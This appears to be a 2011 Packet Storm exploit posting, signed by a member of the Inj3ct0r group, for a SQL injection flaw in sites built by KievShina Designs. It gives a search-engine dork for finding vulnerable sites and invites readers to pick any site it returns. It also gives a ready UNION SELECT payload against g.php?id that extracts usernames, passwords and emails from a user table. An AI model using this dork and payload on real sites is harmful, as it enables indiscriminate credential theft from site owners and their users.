KievShina Designs SQL Injection

2011-06-20T00:00:00
ID PACKETSTORM:102438
Type packetstorm
Reporter Xecuti0N3r
Modified 2011-06-20T00:00:00

Description

                                        
                                            `#(+)Exploit Title: KievShina Designs Sensitive Database Disclosure Vulnerability  
#(+)Author : ^Xecuti0n3r  
#(+) Date : 16.6.2011  
#(+) Hour : 13:37 PM  
#(+) E-mail : xecuti0n3r()yahoo.com  
#(+) dork : intext:"Designed KievShina.com" inurl:g.php  
#(+) Category : Web Apps [SQli]  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
____________________________________________________________________  
____________________________________________________________________  
  
Choose any site that comes up when you enter the dork intext:"Designed KievShina.com" inurl:g.php" in search engine  
  
  
*SQL injection Vulnerability*  
  
# [+]http://site.com/g.php?id='1  
# [+]http://site.com/g.php?id=[SQLi]  
  
  
POC is:   
  
# [+]http://site.com/g.php?id='-1+union+select+1,group_concat(login,0x3a,pass,0x3a,mail,0x0b)+from+user+--  
  
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)Exploit Coded by: ^Xecuti0N3r   
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r  
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)  
(+)<3 to :Indian Cyber Army & Indishell Crew  
(+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com  
########################################################################  
`